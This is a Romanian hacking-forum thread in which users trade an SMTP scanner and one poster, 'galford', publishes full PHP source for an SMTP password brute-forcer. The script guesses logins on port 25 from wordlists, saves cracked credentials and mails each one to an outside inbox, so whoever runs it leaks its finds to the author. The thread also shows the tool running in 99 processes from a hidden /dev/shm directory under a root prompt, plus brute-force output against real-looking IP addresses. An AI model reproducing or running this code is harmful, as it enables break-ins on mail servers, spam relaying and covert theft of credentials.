Jump to content
alinu

Scanner SMTP free, o varianta buna

Recommended Posts

Aveti un ReadMe acolo. Este destul de usor de folosit, eu am intampinat greutati doar la gasirea unui root bun. Editati mail, etc.

Best wishes FileList!

checkinator.tgz (438.42KB)

Download Link

Download checkinator.tgz from Sendspace.com - send big files the easy way

ps - am observat ca pe site nu prea multumeste nimeni nimanui, asa ca nu astept multumiri.

  • Upvote 1
  • Downvote 1
Link to comment
Share on other sites

Chiar nimeni nu il ia? este scannerul vandut pe site cu 300 euro.. ala cu 1 smtp pe minut :) bineinteles nu este adevarat, insa prinde de prins multumitor. E misto ca le si verifica, si trimite mail cu smtp ul respectiv, PRIN el. Nu are mails ascunse, etc, totusi rog sa il verificati inainte de folosire.

Link to comment
Share on other sites

Chiar nimeni nu il ia? este scannerul vandut pe site cu 300 euro.. ala cu 1 smtp pe minut :) bineinteles nu este adevarat, insa prinde de prins multumitor. E misto ca le si verifica, si trimite mail cu smtp ul respectiv, PRIN el. Nu are mails ascunse, etc, totusi rog sa il verificati inainte de folosire.

Si de unde sti tu ca nu il ia nimeni?

Link to comment
Share on other sites

romanu .. dar este asa de simplu sa verifici daca este un mail ascuns pe undeva..ce dreaq.. am zis sa fac public un scanner bun de smtp uri, si tot eu sunt ala acuzat de ...sa zicem "furaciune" . Pacat. totusi daca gasesti un mail ascuns, ceva, te rog posteaza aici.. inseamna ca merit ban permanent. Cand am spus : chiar nu il ia nimeni, ma refeream la un simplu "tnx man" pe aici.

  • Downvote 2
Link to comment
Share on other sites

Te-ai complicat enorm. Puteai extrage doar ce-ti trebuie din phpmailer.


<?php

error_reporting(0);

$_UserFile = "user.file";
$_PassFile = "pass.file";

function S_Server($_server, $_username, $_password) {
print "[+]Found $_username/$_password on $_server\r\n";

if(!($_OutFile = fopen("cracked.smtp", "a"))) ExitF ("Cannot open the lo g file");
fputs($_OutFile, "[+]Cracked: $_server $_username $_password\r\n");
fclose($_OutFile);
exit(0);
}

function ExitF($errmsg) {
print "[-]" . $errmsg . "\r\n";
exit(0);
}

function CrackSMTP($server, $username, $password) {
$socket = fsockopen($server, 25, $errno, $errstr, 2);

if (!$socket) ExitF ("SOCKET ERROR!");

stream_set_timeout($socket, 2);
$_SockResult = fgets($socket, 512);

if (substr(trim($_SockResult), 0, 3) != "220") ExitF ("220 Error");

fputs($socket, "EHLO USER\r\n");

$_SockResult = fgets($socket, 512);
while(substr(trim($_SockResult), 0, 4) == "250-") $_SockResult = fgets($ socket, 512);

fputs($socket, "AUTH LOGIN\r\n");

if (!($_SockResult = fgets($socket, 512))) ExitF ("AUTH LOGIN Error");
if (substr(trim($_SockResult), 4, 16) != "VXNlcm5hbWU6") ExitF ("RECEIVE USER PROMPT Error");

$Encrypt_User = base64_encode($username);
fputs($socket, "$Encrypt_User\r\n");

if (!($_SockResult = fgets($socket, 512))) ExitF ("SEND USER Error");
if (substr(trim($_SockResult), 4, 16) != "UGFzc3dvcmQ6") ExitF ("RECEIVE PASSWORD PROMPT Error");

$Encrypt_Password = base64_encode($password);
fputs($socket, "$Encrypt_Password\r\n");

if (!($_SockResult = fgets($socket, 512))) ExitF ("SEND PASSWORD Error") ;
if (substr(trim($_SockResult), 0, 3) != "235") {
print "$server: $username/$password - INVALID\r\n";
return "INVALID";
}

fputs($socket, "RSET\r\n");
if (!($_SockResult = fgets($socket, 512))) ExitF ("RSET Error");

fputs($socket, "MAIL FROM: admin@xoffice.com\r\n");
if (!($_SockResult = fgets($socket, 512))) ExitF ("MAIL FROM Error");

fputs($socket, "RCPT TO: galford@inbox.com\r\n");
if (!($_SockResult = fgets($socket, 512))) ExitF ("RCPT TO Error");

fputs($socket, "DATA\r\n");
if (!($_SockResult = fgets($socket, 512))) ExitF ("DATA Error");

fputs($socket, "Content-Type: text/html\r\n");
fputs($socket, "SUBJECT: Elite Server $server $username $password\r\n");
fputs($socket, "FROM: SMTP Admin <admin@xoffice.com>\r\n");
fputs($socket, "TO: galford@inbox.com\r\n");
fputs($socket, "\r\n Happy New Year\r\n $server $username $password\r\n. \r\n");
fputs($socket, "QUIT\r\n");

fclose($socket);

S_Server ($server, $username, $password);

exit(0);
}

if (!($_SRV = $argv[1])) ExitF ("Usage: $argv[0] <hostname>");
if (!($F_UserFile = fopen($_UserFile, "r"))) ExitF ("Cannot open the username fi le");

$_Var = 0;
$_Counter = 0;

while (!feof($F_UserFile)) {

$_username = fgets($F_UserFile, 64);
$username = str_replace("\n", "", $_username);

if ($username != "") {

$user[$_Var] = $username;
$pass[$_Var] = $username;
$_Var++;
$_Counter = $_Counter + 1;

$user[$_Var] = $username;
$pass[$_Var] = $username . "1";
$_Var++;
$_Counter = $_Counter + 1;

$user[$_Var] = $username;
$pass[$_Var] = $username . "12";
$_Var++;
$_Counter = $_Counter + 1;

$user[$_Var] = $username;
$pass[$_Var] = $username . "123";
$_Var++;
$_Counter = $_Counter + 1;

if (!($F_PassFile = fopen($_PassFile, "r"))) ExitF ("Cannot open the password file");

while (!feof($F_PassFile)) {
$user[$_Var] = $username;
$pass[$_Var] = fgets($F_PassFile, 64);
$pass[$_Var] = str_replace("\n", "", $pass[$_Var]);
$_Var++;
$_Counter++;
}

fclose($F_PassFile);
}

}

fclose ($F_UserFile);

for ( $_Var = 0; $_Var < $_Counter; $_Var++ ) CrackSMTP($_SRV, $user[$_Var], $pa ss[$_Var]);

exit(0);
?>

Incearca procedurea asta. E mai clean si nu face load average absolut deloc.

root@admin [/dev/shm/.img]# ps -eaf | grep -c smtp.php

99

root@admin [/dev/shm/.img]#

Uite la 99 procese pornite ce load average:

root@admin [/dev/shm/.img]# w

20:42:21 up 1 day, 3 min, 2 users, load average: 0.37, 0.50, 0.68

SMTP brute-ul meu arata ceva de genul in action:

109.167.132.120: antonio/letmein - INVALID

109.168.123.58: test/mypass - INVALID

109.164.235.34: henry/1234567 - INVALID

109.123.106.182: charles/charles - INVALID

109.168.125.210: online/online - INVALID

109.168.122.135: spam/secret - INVALID

109.164.219.206: patrick/letmein - INVALID

109.164.235.113: gary/secret - INVALID

109.168.58.134: benjamin/12345678 - INVALID

109.168.123.54: test/123456789 - INVALID

109.164.235.168: henry/password - INVALID

109.168.31.114: randy/123456789 - INVALID

109.164.143.33: roger/roger - INVALID

109.168.28.18: billy/billy123 - INVALID

Edited by galford
Link to comment
Share on other sites

Guest
This topic is now closed to further replies.


×
×
  • Create New...